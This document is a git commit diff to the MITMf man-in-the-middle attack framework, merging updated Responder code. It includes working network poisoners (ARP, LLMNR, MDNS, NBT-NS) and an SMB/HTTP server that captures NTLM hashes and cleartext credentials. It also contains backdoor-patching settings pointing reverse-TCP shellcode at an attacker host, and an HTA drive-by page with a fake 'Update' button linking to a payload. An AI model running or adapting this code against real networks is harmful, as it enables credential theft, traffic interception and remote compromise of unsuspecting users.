responder code is now up to date with the lastest version

logging is going to have to get cleaned up, but that's a minor issue re-implemented the function to add endpoints to the http server added an option to manually specify the gateways mac in the Spoofer plugin
2025-07-06 13:02:24 -07:00 · 2015-08-05 13:31:04 +02:00 · 2015-08-05 13:31:04 +02:00 · 772ef9ab39
commit 772ef9ab39
parent c527dc1d21
12 changed files with 375 additions and 332 deletions
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@ -446,8 +446,8 @@
 			[[[[WindowsIntelx86]]]]
 				PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
 				# PATCH_METHOD overwrites PATCH_TYPE with jump
-				PATCH_METHOD = automatic
+				PATCH_METHOD = 
-				HOST = 192.168.1.88
+				HOST = 10.9.135.193
 				PORT = 8444
 				SHELL = iat_reverse_tcp_stager_threaded
 				SUPPLIED_SHELLCODE = None
@ -458,8 +458,8 @@
 			[[[[WindowsIntelx64]]]]
 				PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
 				# PATCH_METHOD overwrites PATCH_TYPE with jump
-				PATCH_METHOD = automatic
+				PATCH_METHOD = 
-				HOST = 192.168.1.16
+				HOST = 10.9.135.193
 				PORT = 8088
 				SHELL = iat_reverse_tcp_stager_threaded
 				SUPPLIED_SHELLCODE = None
--- a/core/html/htadriveby.html
+++ b/core/html/htadriveby.html
@ -54,7 +54,7 @@ newHTML.innerHTML = '        \
  <ul>   \
       \
    <li>   \
-      <a target="_blank" href="http://_IP_GOES_HERE_/Flash.hta">   \
+      <a target="_blank" href="http://_IP_GOES_HERE_/_PAYLOAD_GOES_HERE_">   \
        <button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;">   \
          Update   \
        </button>   \
--- a/core/poisoners/ARP.py
+++ b/core/poisoners/ARP.py
@ -38,8 +38,10 @@ class ARPpoisoner:
        except AddrFormatError as e:
            sys.exit("Specified an invalid IP address as gateway")
-        self.gatewaymac = getmacbyip(options.gateway)
+        self.gatewaymac = options.gatewaymac
-        if self.gatewaymac is None: sys.exit("Error: Could not resolve gateway's MAC address")
+        if options.gatewaymac is None:
            self.gatewaymac = getmacbyip(options.gateway)
            if not self.gatewaymac: sys.exit("Error: could not resolve Gateway's mac address")
        self.ignore     = self.get_range(options.ignore)
        if self.ignore is None: self.ignore = []
--- a/core/poisoners/LLMNR.py
+++ b/core/poisoners/LLMNR.py
@ -80,7 +80,6 @@ def IsICMPRedirectPlausible(IP):
        if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
            settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] You can ICMP Redirect on this network.")
            settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x))
            settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.")
        else:
            pass
@ -107,14 +106,14 @@ class LLMNRServer(BaseRequestHandler):
            # Analyze Mode
            if settings.Config.AnalyzeMode:
-                settings.Config.AnalyzeLogger.warning("[Analyze mode: LLMNR]{} Request by {} for {}, ignoring".format(self.client_address[0], Name))
+                settings.Config.AnalyzeLogger.warning("{} [Analyze mode: LLMNR] Request for {}, ignoring".format(self.client_address[0], Name))
            # Poisoning Mode
            else:
                Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
                Buffer.calculate()
                soc.sendto(str(Buffer), self.client_address)
-                settings.Config.PoisonersLogger.warning("[LLMNR] Poisoned answer sent to {} for name {}".format(self.client_address[0], Name))
+                settings.Config.PoisonersLogger.warning("{} [LLMNR] Poisoned request for name {}".format(self.client_address[0], Name))
            if Finger is not None:
                settings.Config.ResponderLogger.info("[FINGER] OS Version: {}".format(Finger[0]))
--- a/core/poisoners/MDNS.py
+++ b/core/poisoners/MDNS.py
@ -87,7 +87,7 @@ class MDNSServer(BaseRequestHandler):
 			# Analyze Mode
 			if settings.Config.AnalyzeMode:
 				if Parse_IPV6_Addr(data):
-					settings.Config.AnalyzeLogger.warning('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (self.client_address[0], Request_Name))
+					settings.Config.AnalyzeLogger.warning('{} [Analyze mode: MDNS] Request for {}, ignoring'.format(self.client_address[0], Request_Name))
 			# Poisoning Mode
 			else:
@ -98,7 +98,7 @@ class MDNSServer(BaseRequestHandler):
 					Buffer.calculate()
 					soc.sendto(str(Buffer), (MADDR, MPORT))
-					settings.Config.PoisonersLogger.warning('[MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name))
+					settings.Config.PoisonersLogger.warning('{} [MDNS] Poisoned answer for name {}'.format(self.client_address[0], Request_Name))
 		except Exception:
 			raise
--- a/core/poisoners/NBTNS.py
+++ b/core/poisoners/NBTNS.py
@ -86,7 +86,7 @@ class NBTNSServer(BaseRequestHandler):
 			# Analyze Mode
 			if settings.Config.AnalyzeMode:
-				settings.Config.AnalyzeLogger.warning("[Analyze mode: NBT-NS] Request by %s for %s, ignoring" % (self.client_address[0], Name))
+				settings.Config.AnalyzeLogger.warning("{} [Analyze mode: NBT-NS] Request for {}, ignoring".format(self.client_address[0], Name))
 			# Poisoning Mode
 			else:
@ -94,8 +94,8 @@ class NBTNSServer(BaseRequestHandler):
 				Buffer.calculate(data)
 				socket.sendto(str(Buffer), self.client_address)
-				settings.Config.PoisonersLogger.warning("[NBT-NS] Poisoned answer sent to %s for name %s (service: %s)" % (self.client_address[0], Name, NBT_NS_Role(data[43:46])))
+				settings.Config.PoisonersLogger.warning("{} [NBT-NS] Poisoned answer for name {} (service: {})" .format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
 			if Finger is not None:
-				settings.Config.ResponderLogger.info("[FINGER] OS Version     : %s" % Finger[0])
+				settings.Config.ResponderLogger.info("[FINGER] OS Version     : {}".format(Finger[0]))
-				settings.Config.ResponderLogger.info("[FINGER] Client Version : %s" % Finger[1])
+				settings.Config.ResponderLogger.info("[FINGER] Client Version : {}".format(Finger[1]))
--- a/core/servers/HTTP.py
+++ b/core/servers/HTTP.py
@ -34,6 +34,20 @@ log = logger().setup_logger("HTTP", formatter)
 class HTTP:
 	static_endpoints = {}
 	endpoints = {}
 	@staticmethod
 	def add_endpoint(url, content_type, payload):
 		Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type), Payload=payload)
 		Buffer.calculate()
 		HTTP.endpoints['/' + url] = Buffer
 	@staticmethod
 	def add_static_endpoint(url, content_type, path):
 		Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type))
 		HTTP.static_endpoints['/' + url] = {'buffer': Buffer, 'path': path}
 	def start(self):
 		try:
 			if OsInterfaceIsSupported():
@ -41,7 +55,7 @@ class HTTP:
 			else:
 				server = ThreadingTCPServer(('', 80), HTTP1)
-			t = threading.Thread(name='SMB', target=server.serve_forever)
+			t = threading.Thread(name='HTTP', target=server.serve_forever)
 			t.setDaemon(True)
 			t.start()
@ -156,7 +170,7 @@ def RespondWithFile(client, filename, dlname=None):
 		Buffer = ServeHtmlFile(Payload = ServeFile(filename))
 	Buffer.calculate()
-	log.info("[HTTP] Sending file {} to {}".format(filename, client))
+	log.info("{} [HTTP] Sending file {}".format(filename, client))
 	return str(Buffer)
@ -166,12 +180,16 @@ def GrabURL(data, host):
 	POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
 	if GET:
-		log.info("[HTTP] GET request from: {} URL: {}".format(host, ''.join(GET)))
+		req = ''.join(GET).strip()
 		log.info("[HTTP] {} - - GET '{}'".format(host, req))
 		return req
 	if POST:
-		log.info("[HTTP] POST request from: {} URL: {}".format(host, ''.join(POST)))
+		req = ''.join(POST).strip()
 		log.info("[HTTP] {} - - POST '{}'".format(host, req))
 		if len(''.join(POSTDATA)) > 2:
 			log.info("[HTTP] POST Data: {}".format(''.join(POSTDATA).strip()))
 		return req
 # Handle HTTP packet sequence.
 def PacketSequence(data, client):
@ -209,7 +227,7 @@ def PacketSequence(data, client):
 			ParseHTTPHash(NTLM_Auth, client)
 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-				log.info("[HTTP] WPAD (auth) file sent to %s" % client)
+				log.info("{} [HTTP] WPAD (auth) file sent".format(client))
 				return WPAD_Custom
 			else:
@ -234,7 +252,7 @@ def PacketSequence(data, client):
 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
-				log.info("[HTTP] WPAD (auth) file sent to %s" % client)
+				log.info("{} [HTTP] Sent WPAD (auth) file" .format(client))
 			return WPAD_Custom
 		else:
@ -246,12 +264,12 @@ def PacketSequence(data, client):
 		if settings.Config.Basic == True:
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
-				log.info("[HTTP] Sending BASIC authentication request to %s" % client)
+				log.info("{} [HTTP] Sending BASIC authentication request".format(client))
 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
-				log.info("[HTTP] Sending NTLM authentication request to %s" % client)
+				log.info("{} [HTTP] Sending NTLM authentication request to".format(client))
 		return str(Response)
@ -263,13 +281,26 @@ class HTTP1(BaseRequestHandler):
 			while True:
 				self.request.settimeout(1)
 				data = self.request.recv(8092)
-				GrabURL(data, self.client_address[0])
+				req_url = GrabURL(data, self.client_address[0])
 				Buffer = WpadCustom(data, self.client_address[0])
 				if Buffer and settings.Config.Force_WPAD_Auth == False:
 					self.request.send(Buffer)
 					if settings.Config.Verbose:
-						log.info("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
+						log.info("{} [HTTP] Sent WPAD (no auth) file".format(self.client_address[0]))
 				if (req_url is not None) and (req_url.strip() in HTTP.endpoints):
 					resp = HTTP.endpoints[req_url.strip()]
 					self.request.send(str(resp))
 				if (req_url is not None) and (req_url.strip() in HTTP.static_endpoints):
 					path = HTTP.static_endpoints[req_url.strip()]['path']
 					Buffer = HTTP.static_endpoints[req_url.strip()]['buffer']
 					with open(path, 'r') as file:
 						Buffer.fields['Payload'] = file.read()
 					Buffer.calculate()
 					self.request.send(str(Buffer))
 				else:
 					Buffer = PacketSequence(data,self.client_address[0])
@ -294,7 +325,7 @@ class HTTPS(StreamRequestHandler):
 				if Buffer and settings.Config.Force_WPAD_Auth == False:
 					self.exchange.send(Buffer)
 					if settings.Config.Verbose:
-						log.info("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
+						log.info("{} [HTTPS] Sent WPAD (no auth) file".format(self.client_address[0]))
 				else:
 					Buffer = PacketSequence(data,self.client_address[0])
--- a/core/servers/SMB.py
+++ b/core/servers/SMB.py
@ -27,22 +27,22 @@ from core.responder.utils import *
 class SMB:
-	def start(self):
+    def start(self):
-		try:
+        try:
-			if OsInterfaceIsSupported():
+            if OsInterfaceIsSupported():
-				server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
+                server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
-				server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
+                server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
-			else:
+            else:
-				server1 = ThreadingTCPServer(('', 445), SMB1)
+                server1 = ThreadingTCPServer(('', 445), SMB1)
-				server2 = ThreadingTCPServer(('', 139), SMB1)
+                server2 = ThreadingTCPServer(('', 139), SMB1)
-			for server in [server1, server2]:
+            for server in [server1, server2]:
-				t = threading.Thread(name='SMB', target=server.serve_forever)
+                t = threading.Thread(name='SMB', target=server.serve_forever)
-				t.setDaemon(True)
+                t.setDaemon(True)
-				t.start()
+                t.start()
-		except Exception as e:
+        except Exception as e:
-			print "Error starting SMB server: {}".format(e)
+            print "Error starting SMB server: {}".format(e)
-			print_exc()
+            print_exc()
 class ThreadingTCPServer(ThreadingMixIn, TCPServer):
@ -58,52 +58,61 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 # Detect if SMB auth was Anonymous
 def Is_Anonymous(data):
-	SecBlobLen = struct.unpack('<H',data[51:53])[0]
+    SecBlobLen = struct.unpack('<H',data[51:53])[0]
-	if SecBlobLen < 260:
+    if SecBlobLen < 260:
-		LMhashLen = struct.unpack('<H',data[89:91])[0]
+        LMhashLen = struct.unpack('<H',data[89:91])[0]
-		return True if LMhashLen == 0 or LMhashLen == 1 else False
+        return True if LMhashLen == 0 or LMhashLen == 1 else False
-	if SecBlobLen > 260:
+    if SecBlobLen > 260:
-		LMhashLen = struct.unpack('<H',data[93:95])[0]
+        LMhashLen = struct.unpack('<H',data[93:95])[0]
-		return True if LMhashLen == 0 or LMhashLen == 1 else False
+        return True if LMhashLen == 0 or LMhashLen == 1 else False
 def Is_LMNT_Anonymous(data):
-	LMhashLen = struct.unpack('<H',data[51:53])[0]
+    LMhashLen = struct.unpack('<H',data[51:53])[0]
-	return True if LMhashLen == 0 or LMhashLen == 1 else False
+    return True if LMhashLen == 0 or LMhashLen == 1 else False
 #Function used to know which dialect number to return for NT LM 0.12
 def Parse_Nego_Dialect(data):
-	packet = data
+    packet = data
-	try:
+    try:
-		Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
+        Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
 		#print hex(Dialect)
-		if Dialect[0] == "NT LM 0.12":
+        if Dialect[0] == "NT LM 0.12":
-			return "\x00\x00"
+            return "\x00\x00"
-		if Dialect[1] == "NT LM 0.12":
+        if Dialect[1] == "NT LM 0.12":
-			return "\x01\x00"
+            return "\x01\x00"
-		if Dialect[2] == "NT LM 0.12":
+        if Dialect[2] == "NT LM 0.12":
-			return "\x02\x00"
+            return "\x02\x00"
-		if Dialect[3] == "NT LM 0.12":
+        if Dialect[3] == "NT LM 0.12":
-			return "\x03\x00"
+            return "\x03\x00"
-		if Dialect[4] == "NT LM 0.12":
+        if Dialect[4] == "NT LM 0.12":
-			return "\x04\x00"
+            return "\x04\x00"
-		if Dialect[5] == "NT LM 0.12":
+        if Dialect[5] == "NT LM 0.12":
-			return "\x05\x00"
+            return "\x05\x00"
-		if Dialect[6] == "NT LM 0.12":
+        if Dialect[6] == "NT LM 0.12":
-			return "\x06\x00"
+            return "\x06\x00"
-		if Dialect[7] == "NT LM 0.12":
+        if Dialect[7] == "NT LM 0.12":
-			return "\x07\x00"
+            return "\x07\x00"
-		if Dialect[8] == "NT LM 0.12":
+        if Dialect[8] == "NT LM 0.12":
-			return "\x08\x00"
+            return "\x08\x00"
-		if Dialect[9] == "NT LM 0.12":
+        if Dialect[9] == "NT LM 0.12":
-			return "\x09\x00"
+            return "\x09\x00"
-		if Dialect[10] == "NT LM 0.12":
+        if Dialect[10] == "NT LM 0.12":
-			return "\x0a\x00"
+            return "\x0a\x00"
-	except Exception:
+        if Dialect[11] == "NT LM 0.12":
-		print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
+            return "\x0b\x00"
-		print hexdump(packet)
+        if Dialect[12] == "NT LM 0.12":
            return "\x0c\x00"
        if Dialect[13] == "NT LM 0.12":
            return "\x0d\x00"
        if Dialect[14] == "NT LM 0.12":
            return "\x0e\x00"
        if Dialect[15] == "NT LM 0.12":
            return "\x0f\x00"
    except Exception:
        print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
        print hexdump(packet)
 #Set MID SMB Header field.
 def midcalc(data):
@ -126,301 +135,301 @@ def tidcalc(data):
    return pack
 def ParseShare(data):
-	packet = data[:]
+    packet = data[:]
-	a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
+    a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
-	if a:
+    if a:
-		settings.Config.ResponderLogger.info("[SMB] Requested Share     : %s" % a.group(0).replace('\x00', ''))
+        settings.Config.ResponderLogger.info("[SMB] Requested Share     : %s" % a.group(0).replace('\x00', ''))
 #Parse SMB NTLMSSP v1/v2
 def ParseSMBHash(data,client):
-	SecBlobLen = struct.unpack('<H',data[51:53])[0]
+    SecBlobLen = struct.unpack('<H',data[51:53])[0]
-	BccLen     = struct.unpack('<H',data[61:63])[0]
+    BccLen     = struct.unpack('<H',data[61:63])[0]
-	if SecBlobLen < 260:
+    if SecBlobLen < 260:
-		SSPIStart    = data[75:]
+        SSPIStart    = data[75:]
-		LMhashLen    = struct.unpack('<H',data[89:91])[0]
+        LMhashLen    = struct.unpack('<H',data[89:91])[0]
-		LMhashOffset = struct.unpack('<H',data[91:93])[0]
+        LMhashOffset = struct.unpack('<H',data[91:93])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+        LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[97:99])[0]
+        NthashLen    = struct.unpack('<H',data[97:99])[0]
-		NthashOffset = struct.unpack('<H',data[99:101])[0]
+        NthashOffset = struct.unpack('<H',data[99:101])[0]
-	else:
+    else:
-		SSPIStart    = data[79:]
+        SSPIStart    = data[79:]
-		LMhashLen    = struct.unpack('<H',data[93:95])[0]
+        LMhashLen    = struct.unpack('<H',data[93:95])[0]
-		LMhashOffset = struct.unpack('<H',data[95:97])[0]
+        LMhashOffset = struct.unpack('<H',data[95:97])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+        LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[101:103])[0]
+        NthashLen    = struct.unpack('<H',data[101:103])[0]
-		NthashOffset = struct.unpack('<H',data[103:105])[0]
+        NthashOffset = struct.unpack('<H',data[103:105])[0]
-	if NthashLen == 24:
+    if NthashLen == 24:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+        SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[105:107])[0]
+        DomainLen    = struct.unpack('<H',data[105:107])[0]
-		DomainOffset = struct.unpack('<H',data[107:109])[0]
+        DomainOffset = struct.unpack('<H',data[107:109])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+        Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
-		UserLen      = struct.unpack('<H',data[113:115])[0]
+        UserLen      = struct.unpack('<H',data[113:115])[0]
-		UserOffset   = struct.unpack('<H',data[115:117])[0]
+        UserOffset   = struct.unpack('<H',data[115:117])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+        Username     = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
+        WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
-		SaveToDb({
+        SaveToDb({
-			'module': 'SMB', 
+            'module': 'SMB', 
-			'type': 'NTLMv1-SSP', 
+            'type': 'NTLMv1-SSP', 
-			'client': client, 
+            'client': client, 
-			'user': Domain+'\\'+Username, 
+            'user': Domain+'\\'+Username, 
-			'hash': SMBHash, 
+            'hash': SMBHash, 
-			'fullhash': WriteHash,
+            'fullhash': WriteHash,
-		})
+        })
-	if NthashLen > 60:
+    if NthashLen > 60:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+        SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[109:111])[0]
+        DomainLen    = struct.unpack('<H',data[109:111])[0]
-		DomainOffset = struct.unpack('<H',data[111:113])[0]
+        DomainOffset = struct.unpack('<H',data[111:113])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+        Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
-		UserLen      = struct.unpack('<H',data[117:119])[0]
+        UserLen      = struct.unpack('<H',data[117:119])[0]
-		UserOffset   = struct.unpack('<H',data[119:121])[0]
+        UserOffset   = struct.unpack('<H',data[119:121])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+        Username     = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
+        WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
-		SaveToDb({
+        SaveToDb({
-			'module': 'SMB', 
+            'module': 'SMB', 
-			'type': 'NTLMv2-SSP', 
+            'type': 'NTLMv2-SSP', 
-			'client': client, 
+            'client': client, 
-			'user': Domain+'\\'+Username, 
+            'user': Domain+'\\'+Username, 
-			'hash': SMBHash, 
+            'hash': SMBHash, 
-			'fullhash': WriteHash,
+            'fullhash': WriteHash,
-		})
+        })
 # Parse SMB NTLMv1/v2
 def ParseLMNTHash(data, client):
-	LMhashLen = struct.unpack('<H',data[51:53])[0]
+    LMhashLen = struct.unpack('<H',data[51:53])[0]
-	NthashLen = struct.unpack('<H',data[53:55])[0]
+    NthashLen = struct.unpack('<H',data[53:55])[0]
-	Bcc = struct.unpack('<H',data[63:65])[0]
+    Bcc = struct.unpack('<H',data[63:65])[0]
-	Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
+    Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
-	if NthashLen > 25:
+    if NthashLen > 25:
-		FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
+        FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
-		LmHash = FullHash[:32].upper()
+        LmHash = FullHash[:32].upper()
-		NtHash = FullHash[32:].upper()
+        NtHash = FullHash[32:].upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
+        WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
-	
+    
-		SaveToDb({
+        SaveToDb({
-			'module': 'SMB', 
+            'module': 'SMB', 
-			'type': 'NTLMv2', 
+            'type': 'NTLMv2', 
-			'client': client, 
+            'client': client, 
-			'user': Domain+'\\'+Username, 
+            'user': Domain+'\\'+Username, 
-			'hash': NtHash, 
+            'hash': NtHash, 
-			'fullhash': WriteHash,
+            'fullhash': WriteHash,
-		})
+        })
-	if NthashLen == 24:
+    if NthashLen == 24:
-		NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
+        NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
-		LmHash = data[65:65+LMhashLen].encode('hex').upper()
+        LmHash = data[65:65+LMhashLen].encode('hex').upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
+        WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
-		SaveToDb({
+        SaveToDb({
-			'module': 'SMB', 
+            'module': 'SMB', 
-			'type': 'NTLMv1', 
+            'type': 'NTLMv1', 
-			'client': client, 
+            'client': client, 
-			'user': Domain+'\\'+Username, 
+            'user': Domain+'\\'+Username, 
-			'hash': NtHash, 
+            'hash': NtHash, 
-			'fullhash': WriteHash,
+            'fullhash': WriteHash,
-		})
+        })
 def IsNT4ClearTxt(data, client):
-	HeadLen = 36
+    HeadLen = 36
-	if data[14:16] == "\x03\x80":
+    if data[14:16] == "\x03\x80":
-		SmbData = data[HeadLen+14:]
+        SmbData = data[HeadLen+14:]
-		WordCount = data[HeadLen]
+        WordCount = data[HeadLen]
-		ChainedCmdOffset = data[HeadLen+1]
+        ChainedCmdOffset = data[HeadLen+1]
-		if ChainedCmdOffset == "\x75":
+        if ChainedCmdOffset == "\x75":
-			PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
+            PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
-			if PassLen > 2:
+            if PassLen > 2:
-				Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
+                Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
-				User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
+                User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
-				settings.Config.ResponderLogger.info("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
+                settings.Config.ResponderLogger.info("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
-				WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
+                WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
 # SMB Server class, NTLMSSP
 class SMB1(BaseRequestHandler):
-	def handle(self):
+    def handle(self):
-		try:
+        try:
-			while True:
+            while True:
-				data = self.request.recv(1024)
+                data = self.request.recv(1024)
-				self.request.settimeout(1)
+                self.request.settimeout(1)
-				if len(data) < 1:
+                if len(data) < 1:
-					break
+                    break
-				##session request 139
+                ##session request 139
-				if data[0] == "\x81":
+                if data[0] == "\x81":
-					Buffer = "\x82\x00\x00\x00"
+                    Buffer = "\x82\x00\x00\x00"
-					self.request.send(Buffer)
+                    try:
-					try:
+                        self.request.send(Buffer)
-						data = self.request.recv(1024)
+                        data = self.request.recv(1024)
-					except:
+                    except:
-						pass
+                        pass
-				# Negociate Protocol Response
+                # Negociate Protocol Response
-				if data[8:10] == "\x72\x00":
+                if data[8:10] == "\x72\x00":
-					# \x72 == Negociate Protocol Response
+                    # \x72 == Negociate Protocol Response
-					Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
+                    Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
-					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
+                    Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
-					Body.calculate()
+                    Body.calculate()
-		
+        
-					Packet = str(Header)+str(Body)
+                    Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(1024)
+                    data = self.request.recv(1024)
-				# Session Setup AndX Request
+                # Session Setup AndX Request
-				if data[8:10] == "\x73\x00":
+                if data[8:10] == "\x73\x00":
-					IsNT4ClearTxt(data, self.client_address[0])
+                    IsNT4ClearTxt(data, self.client_address[0])
-					
+                    
-					# STATUS_MORE_PROCESSING_REQUIRED
+                    # STATUS_MORE_PROCESSING_REQUIRED
-					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
+                    Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
-					Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
+                    Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
-					Body.calculate()
+                    Body.calculate()
-		
+        
-					Packet = str(Header)+str(Body)
+                    Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                    Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+                    self.request.send(Buffer)
-					data = self.request.recv(4096)
+                    data = self.request.recv(4096)
-					# STATUS_SUCCESS
+                    # STATUS_SUCCESS
-					if data[8:10] == "\x73\x00":
+                    if data[8:10] == "\x73\x00":
-						if Is_Anonymous(data):
+                        if Is_Anonymous(data):
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+                            Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
-							Body = SMBSessEmpty()
+                            Body = SMBSessEmpty()
-							Packet = str(Header)+str(Body)
+                            Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+                            Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-							self.request.send(Buffer)
+                            self.request.send(Buffer)
-						else:
+                        else:
-							# Parse NTLMSSP_AUTH packet
+                            # Parse NTLMSSP_AUTH packet
-							ParseSMBHash(data,self.client_address[0])
+                            ParseSMBHash(data,self.client_address[0])
-							# Send STATUS_SUCCESS
+                            # Send STATUS_SUCCESS
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                            Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
